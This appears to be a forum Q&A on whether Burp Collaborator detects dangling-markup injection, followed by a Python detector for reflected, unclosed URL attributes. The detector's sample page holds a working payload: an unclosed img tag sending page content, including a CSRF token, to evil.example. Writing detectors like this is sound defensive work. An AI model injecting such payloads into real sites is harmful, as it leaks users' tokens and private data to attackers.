Does Burp Collaborator test for "dangling markup" vulnerabilities?
This article on GitHub (https://githubengineering.com/githubs-post-csp-journey/?utm_source=webopsweekly&utm_medium=email) outlines an attack where an attacker injects an unclosed img tag, which then includes everything until the matching quote in a request to some-evil-site, potentially sending sensitive data.
Question: does Burp Collaborator find issues like this?
In this situation, Burp Scanner checks for various XSS-style injection vectors, including image tags, and will report these to the user.
It doesn’t attempt to actively exploit the issue to exfiltrate data via Burp Collaborator. You could do this easily enough with the manual Burp Collaborator client and your own payloads.
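
A defender-side check for the pattern discussed in this thread, added here as an example (not code from the original posts or from Burp): it walks tag attributes roughly the way a browser's tokenizer does and flags URL attributes whose quoted value has swallowed the markup that follows. The function name, the attribute list, the `<`-plus-newline heuristic and the sample page are assumptions constructed for illustration.

```python
import re

# Attributes whose value the browser turns into a request or navigation
# (assumed list for this example, not exhaustive).
URL_ATTRS = {"src", "href", "action", "formaction", "poster", "background"}

TAG_OPEN = re.compile(r"<([a-zA-Z][a-zA-Z0-9]*)")
ATTR = re.compile(
    r"""\s*([^\s"'<>/=]+)"""                                    # attribute name
    r"""(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?"""   # optional value
)

def find_dangling_markup(html):
    """Return (tag, attribute, value) for URL attributes that swallowed markup."""
    findings = []
    pos = 0
    while (tag := TAG_OPEN.search(html, pos)):
        pos = tag.end()
        # Consume attributes one by one; a quoted value runs to the NEXT
        # matching quote, even across tags and newlines, as in a browser.
        while (attr := ATTR.match(html, pos)):
            pos = attr.end()
            name = attr.group(1).lower()
            value = attr.group(2) or attr.group(3) or attr.group(4) or ""
            # Heuristic: a genuine URL does not contain both "<" and a newline.
            if name in URL_ATTRS and "<" in value and "\n" in value:
                findings.append((tag.group(1).lower(), name, value))
    return findings

# Constructed sample response: the comment field reflects an unclosed img tag,
# and the apostrophe in "that's" ends up closing the src attribute.
SAMPLE = """<html><body>
<div class="comment"><img src='https://evil.example/log?</div>
<form method="post" action="/settings">
<input type="hidden" name="csrf_token" value="CONSTRUCTED-TOKEN-123">
</form>
<p>Thanks, that's all.</p>
<img src="/static/logo.png" alt="logo">
</body></html>"""

if __name__ == "__main__":
    for tag, name, value in find_dangling_markup(SAMPLE):
        print(f"<{tag} {name}> value spans {len(value)} chars of page content")
```

Run over stored responses (for example, exported proxy history), a finding means the reflected input reached the page unencoded and the captured value shows exactly which page content would ride along in the request.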